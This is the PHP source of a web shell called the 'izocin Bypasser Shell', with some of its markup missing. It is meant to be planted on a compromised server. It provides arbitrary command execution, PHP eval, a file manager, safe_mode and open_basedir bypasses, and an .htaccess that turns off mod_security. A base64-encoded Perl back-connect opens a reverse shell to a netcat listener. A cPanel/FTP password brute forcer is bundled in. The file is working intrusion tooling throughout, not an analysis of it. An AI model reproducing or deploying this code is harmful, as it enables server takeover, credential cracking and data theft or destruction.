'0', 'disable_functions' => '', 'file_uploads' => 'On', 'max_execution_time' => '0', 'memory_limit' => '1024M', 'open_basedir' => '', 'safe_mode' => 'Off', 'sql.safe_mode' => 'Off', 'upload_max_filesize' => '1024M', ); foreach ($ini_reconf as $key => $value) { @ini_set($key, $value); } date_default_timezone_set('Asia/Ho_Chi_Minh'); function dectectos() { $curos = strtoupper(substr(PHP_OS, 0, 3)); return $curos; } //File download $fdownload=@$_GET['fdownload']; if ($fdownload != "" ){ if (file_exists($fdownload)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($fdownload)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize($fdownload)); ob_clean(); flush(); readfile($fdownload); exit; } } //PHP Info function info() { ?>
(.*).*$%ms', '$1', $pinfo ) ) ) ; ?>

 
'; for($i=0; $i '; } } for($i=0; $i '; } } echo '
File / Folder Name Owner Group    Size Download Edit Chmod Delete Last Modifed
',$list[$i],' ',getowner($dir.$list[$i]),' ',getgroup($dir.$list[$i]),' ',getmode($dir.$list[$i]),' Delete '.date ("d-m-y H:i P", filemtime($dir.$list[$i])).'
',$list[$i],' ',getowner($dir.$list[$i]),' ',getgroup($dir.$list[$i]),' ',byteConvert(getsize($dir.$list[$i])),' '; if (@is_readable($dir.$list[$i])){ echo ' Download '; } else { echo 'Unreadable'; } echo ' '; if (@is_readable($dir.$list[$i])){ echo ' Edit '; } else { echo 'Unreadable'; } echo ' ',getmode($dir.$list[$i]),' Delete '.date ("d-m-y H:i P", filemtime($dir.$list[$i])).'
 
File View / Edit:  
File Download:  
Chmod:    
File Upload:  
'; } //Default function def() { $id=$_GET['id']; if (function_exists('posix_getpwuid') && function_exists('posix_geteuid')) { $euserinfo = @posix_getpwuid(@posix_geteuid()); } if (function_exists('posix_getgrgid') && function_exists('posix_getegid')) { $egroupinfo = @posix_getgrgid(@posix_getegid()); } echo '


OS : ',php_uname(),'
SERVER IP : ',gethostbyname($_SERVER['SERVER_NAME']),'
SERVER NAME : ',$_SERVER['SERVER_NAME'],'
SERVER SOFTWARE : ',$_SERVER['SERVER_SOFTWARE'],'
SERVER ADMIN : ',$_SERVER['SERVER_ADMIN'],'
PHP VERSiON : ',$ephpv = @phpversion(),'
uid = ',$euserinfo['uid'],' ( ',$euserinfo['name'],' )      gid = ',$egroupinfo['gid'],' ( ',$egroupinfo['name'],' )

'; } //Web Command function wcom () { $cmd=$_POST['cmd']; $result=ex("$cmd"); echo '

Run Command

 



'; } //PHP Eval function eeval() { $code=stripslashes($_POST['code']); echo '

PHP Code Evaluating





'; } //Php 5.2.9 Bypass function eizo() { $kokdosya = "59.php"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!"); $metin = ""; fwrite ( $dosya , $metin ) ; fclose ($dosya); } //Safe Modu Offla function epriv8() { $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!"); $metin = " SecFilterEngine Off SecFilterScanPOST Off "; fwrite ( $dosya , $metin ) ; fclose ($dosya); $kokdosya = "php.ini"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!"); $metin = "safe_mode = OFF disable_functions = NONE"; fwrite ( $dosya , $metin ) ; fclose ($dosya); } //Openbasedir Bypass function eobypass() { ?> ";print"
$delmtxt
";} function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd); $nscmd=htmlspecialchars($scmd);print $nscmd;} elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd); $ecmd = join("n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;} elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r"); while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));; print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean(); print htmlspecialchars($pret);}} function input($type,$name,$value,$size) {if (empty($value)){print "";} elseif(empty($name)&&empty($size)){print "";} elseif(empty($size)){print "";} else {print "";}} function permcol($path){if (is_writable($path)){print ""; callperms($path); print "";} elseif (!is_readable($path)&&!is_writable($path)){print ""; callperms($path); print "";} else {print "";callperms($path);}} if ($dlink=="dwld"){download($_REQUEST['dwld']);} function download($dwfile) {$size = filesize($dwfile); @header("Content-Type: application/force-download;name=$dwfile"); @header("Content-Transfer-Encoding: binary"); @header("Content-Length: $size"); @header("Content-Disposition: attachment; filename=$dwfile"); @header("Expires: 0"); @header("Cache-Control: no-cache, must-revalidate"); @header("Pragma: no-cache"); @readfile($dwfile); exit;} ?> Hack15Shell ";$ef=""; $st=""; $et="
";$c1=""; $c2="";$ec=""; $sta=""; $sfnt="";$efnt=""; ################# Editing By User ######################## /////////////////////////////// // $mysql_use = "no"; //"yes" // $mhost = "localhost"; // $muser = "root"; // $mpass = "pass"; // $mdb = "name"; // $them = "xxx"; //any site // $you = "xx"; //your username // $flib = "hack15.txt"; // $folder = "hack15.txt"; // /////////////////////////////// ################# PhP Design (Start) ######################## delm(": Php Hacker v1.0 (Shell) :"); print"";print"";print"
"; print"
[ Php hacker v1.0 ]::[ Owned By Yourname ]
"; print"
";print "
"; print"";print"
"; print"
";print "Gr33tz To"; print " - Back"; print "
"; echo "
"; print ""; if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "ON (secure)"; } else {$safemode = false; $hsafemode = "OFF (not secure)";} echo("Safe-mode: $hsafemode"); print "
"; echo "
"; ################# PhP Hacked ######################## // read greet // if ($linux=='greet') { echo ""; } // read file unzend sorce // if(empty($_POST['sorce'])){ } else { } // read file unzend functions // if(empty($_POST['func'])){ } else { echo "

"; }// read file symlink ( ) // if(empty($_POST['sym'])){ } else { echo ""; } } // read file plugin ( ) // if(empty($_POST['plugin'])){ } else { echo ""; } // read file id ( ) // if ($_POST['rid'] ){ echo ""; break; } // read file imap ( ) // $string = !empty($_POST['rimap']) ? $_POST['rimap'] : 0; if(empty($_POST['rimap'])){ } else { echo ""; } // read file Curl ( ) // if(empty($_POST['curl'])){ } else { echo ""; } // read file SQL ( ) // if(empty($_POST['ssql'])){ } else { echo ""; } // read file copy & ini ( ) // if (isset ($_REQUEST['safefile'])){ $file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){ if(empty($_GET['file'])){if(empty($_POST['file'])){ print "
[ Please choose a file first to read it using copy() ]
"; } else {$file=$_POST['file'];}} else {$file=$_GET['file'];}} $temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){ $zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo);echo "
".$sta.htmlspecialchars($tekst).$eta."
";unlink($temp);} else { print "
Sorry, Can't read the selected file !!

";}}if (isset ($_REQUEST['inifile'])){ ini_restore("safe_mode");ini_restore("open_basedir"); print "
".$sta;
if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."
";} delm(": Safe mode bypass :"); print ""; print "
"; print $st.$c1."
Using copy() function
"; print $ec.$c2.$sf." "; input("text","safefile",$nscdir,75); input("hidden","scdir",$nscdir,0);print " "; input("submit","","Read-F","");print "".$ec.$ef.$et; print "
"; print $st.$c1."
Using ini_restore() function
"; print $ec.$c2.$sf." "; input("text","inifile",$nscdir,75); input("hidden","scdir",$nscdir,0);print " "; input("submit","","Read-F","");print "".$ec.$ef.$et; print "
"; print ""; print "
"; print $st.$c1."
Using sql() function
"; print $ec.$c2.$sf." "; input("text","ssql",$nscdir,75); input("hidden","scdir",$nscdir,0);print " "; input("submit","","Read-F","");print "".$ec.$ef.$et; print "
"; print $st.$c1."
Using Curl() function
"; print $ec.$c2.$sf." "; input("text","curl",$nscdir,75); input("hidden","scdir",$nscdir,0);print " "; input("submit","","Read-F","");print "".$ec.$ef.$et; print "
"; print ""; print "
"; print $st.$c1."
Using imap() function
"; print $ec.$c2.$sf." "; input("text","rimap",$nscdir,75); input("hidden","scdir",$nscdir,0);print " "; input("submit","","Read-F","");print "".$ec.$ef.$et; print "
"; print $st.$c1."
Using id() function
"; print $ec.$c2.$sf." "; input("text","rid",$nscdir,75); input("hidden","scdir",$nscdir,0);print " "; input("submit","","Read-F","");print "".$ec.$ef.$et; print "
"; print ""; print "
"; print $st.$c1."
Using plugin() function
"; print $ec.$c2.$sf." "; input("text","plugin",$nscdir,75); input("hidden","scdir",$nscdir,0);print " "; input("submit","","Read-F","");print "".$ec.$ef.$et; print "
"; print $st.$c1."
Using symlink() function
"; print $ec.$c2.$sf." "; input("text","sym",$nscdir,75); input("hidden","scdir",$nscdir,0);print " "; input("submit","","Read-F","");print "".$ec.$ef.$et; print "
"; delm(": Unzend Config :"); print ""; print "
"; print $st.$c1."
Connect To Functions Of Config
"; print $ec.$c2.$sf." "; input("text","func",$nscdir,75); input("hidden","scdir",$nscdir,0);print " "; input("submit","","Read-F","");print "".$ec.$ef.$et; print "
"; ?>"; print"
"; print"
Coder By GeNiUs HaCkEr
[ Team Hack15 :: Go to : Http://Hack15.com ]"; print"
"; ?> ionCube & Zend Decoder





ForceType application/x-httpd-php4 '; if(fwrite($H,$Str)){ echo "[+] Evil File Created Succes ! n"; } fclose($H); break; } //Php 4.x Bypass function e444() { ?> Safe Mode Command Execution Bypass Exploit
"; print_r(' 

Komut :



Hazir Komutlar :=) :
'); ini_restore("safe_mode"); ini_restore("open_basedir"); if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); } if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); } $uid=safeshell('id'); $server=safeshell('uname -a'); echo "
";
echo "Bilgiler::$uid
";
echo "Server:$server
";
echo "Komut Sonuclari:
"; 
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "
"; ?> "; } else {echo'"error"';} $chm = chmod("izo.izocin" , 0755); if ($chm == true){ echo "chmoded the file to 755"; }else{ echo "sorry file didn't chmoded"; } ?> ;n-- SHOW COLUMNS FROM ;"; } echo '

Working with MySQL

DBHost:   DBPort:   DBUser:   DBPass:   DBName:



'; if($_POST['go']) { $connect = @mysql_connect($dbhost.":".$dbport, $dbuser, $dbpass); if (!$connect) { echo ''; } else { @mysql_select_db($dbname, $connect); echo '
'; foreach($querys as $num=>$query){ if(strlen($query)>5){ echo 'Query#'.$num.' : '.htmlspecialchars($query).'
'; $res = @mysql_query($query,$connect); $error = @mysql_error($connect); if($error) { echo '
Error : '.$error.'

'; } else { if (@mysql_num_rows($res) > 0){ $sql2 = $sql = $keys = $values = ''; while (($row = @mysql_fetch_assoc($res))){ $keys = @implode('  ', @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode('  ',$values); $sql2 .= ' '.$values.' '; } echo ''; $sql = ''; $sql .= $sql2; echo $sql; echo '
 '.$keys.' 

'; } else { if(($rows = @mysql_affected_rows($connect))>=0) { echo '
affected rows : '.$rows.'

'; } } } @mysql_free_result($res); } } echo '

'; @mysql_close($connect); } } } //Back Connect function eback() { $bc_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; echo '

Back Connecting

Run NetCat on your machine: nc -l -p 1542



Then input your IP and Port

:



'; $pip=$_POST['pip']; $pport=$_POST['pport']; if ($pip <> '') { $fp=fopen($_POST['ppath'].DS.rand(0,10).'bc_perl_enhack.pl', 'w'); if (!$fp){ $result = 'Error: couldn't write file to open socket connection'; } else { @fputs($fp,@base64_decode($bc_perl)); fclose($fp); $result = ex('perl '.$_POST['ppath'].'/bc_perl_enhack.pl '.$pip.' '.$pport.' &'); } } } //File Edit function fedit() { $fedit=$_GET['fedit']; if(is_file($fedit)) { if ($fedit != "" ){ $fedit=realpath($fedit); $lines = file($fedit); echo '



 
'; $savefile=stripslashes($_POST['savefile']); $filepath=realpath($_POST['filepath']); if ($savefile <> "") { $fp=@fopen("$filepath","w+"); if($fp){ fwrite($fp,"") ; fwrite($fp,$savefile) ; fclose($fp); echo ''; } else { echo ''; } echo ''; } exit(); } } else { echo '',$fedit,' is not file.
<-- back '; } } // Execute function ex($param) { $res = ''; if (!empty($param)){ if(function_exists('exec')) { @exec($param,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($param); } elseif(function_exists('system')) { @ob_start(); @system($param); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($param); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($param,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } //Upload File $rpath=@$_POST['Fupath']; if ($rpath <> "") { $uploadfile = $rpath."/" . $_FILES['userfile']['name']; if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo ''; } else { echo ''; } } //Delete file $frpath=@$_GET['fdelete']; function rmdirr($dirname) { // Sanity check if (!file_exists($dirname)) { return false; } // Simple delete for a file if (is_file($dirname) || is_link($dirname)) { return unlink($dirname); } // Loop through the folder $dir = dir($dirname); while (false !== $entry = $dir->read()) { // Skip pointers if ($entry == '.' || $entry == '..') { continue; } // Recurse rmdirr($dirname . DIRECTORY_SEPARATOR . $entry); } // Clean up $dir->close(); return rmdir($dirname); } if ($frpath <> "") { if(rmdirr($frpath)) { echo ''; } else { echo ''; } echo ''; exit(0); } ?> :: izleyici security fucker shell :: "" ){ $fchmod=realpath($fchmod); echo '

Chang mode ',$fchmod,'


 

'; $mode=$_POST['mode']; if ($mode != ""){ if(chmod($fchmod , $mode)) { echo "Successfully"; } else { echo "Permission denied"; } } echo ''; exit(); } ?>

!  izocin Bypasser Shell  !
Released 12.08.2009


=====[~]=====

File Manager

Web Command

PHP Evaluator

Php 5.2.9 Bypass

Safe Modu Offla

Openbasedir Bypass

Vbulletin config decoder

Php 4 Back

Php 4.4.x Bypass

Perl cgi

ln -s bypass

Apachi Bypass

Nitrojen Bombasi

Cpanel Brute

Back Connect

MySQL Query

Server Infos

=====[~]=====

:::::::::::::::: [ :: Copyright © 2009 - Developed by ?zocin Security Team :: ] ::::::::::::::::

"; exit; } ?> Aria cPanel cracker version : 1.0


bio - brute - grab users

"; if ( $page == 'bio' ){ print "


Please enter your USERNAME and PASSWORD to logon
user
220 +ok
pass ********
220 +ok login successful
[ user@aria-security.com ]# info

Aria cPanel cracker version : 1.0

Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir bypasser ... more stuff will be included in the next version
Our website , http://Aria-security.com

"; }elseif( $page == 'crack'){ // Aria-Security Team [Persian Security Network] @ini_set('memory_limit', 1000000000000); $connect_timeout=5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; if($target == ''){ $target = 'localhost'; } print "


Target :


Username

Password



Options : cPanel ftp ==>

"; ?> Error : Connection timed out , make confidence about validation of target !"; exit;} elseif ( curl_errno($ch) == 0 ){ print "[ user@aria-security.com ]# Attacking has been done , found username , $user and password , $pass
";}curl_close($ch);} function cpanel_check($host,$user,$pass,$timeout){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:2082"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print " Error : Connection timed out , make confidence about validation of target !"; exit;} elseif ( curl_errno($ch) == 0 ){ print "[ user@aria-security.com ]# Attacking has been done , found username , $user and password , $pass
";}curl_close($ch);} if(isset($submit) && !empty($submit)){ $userlist = explode ("n" , $users ); $passlist = explode ("n" , $pass ); print "[ user@aria-security.com ]# Attacking ...
"; foreach ($userlist as $user) { $_user = trim($user); foreach ($passlist as $password ) { $_pass = trim($password); if($option == "ftp"){ ftp_check($target,$_user,$_pass,$connect_timeout); } if ($option == "cpanel") { cpanel_check($target,$_user,$_pass,$connect_timeout); } } } } }elseif ( $page == 'users'){ echo "

"; echo '

'; $file = $_POST['file']; $level=0; if(!file_exists("file:")) @mkdir("file:"); @chdir("file:"); $level++; $hardstyle = @explode("/", $file); // A R I A for($a=0;$a"; if(FALSE==curl_exec($ch)) die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.'); echo ' '; curl_close($ch); print '
'; } ?>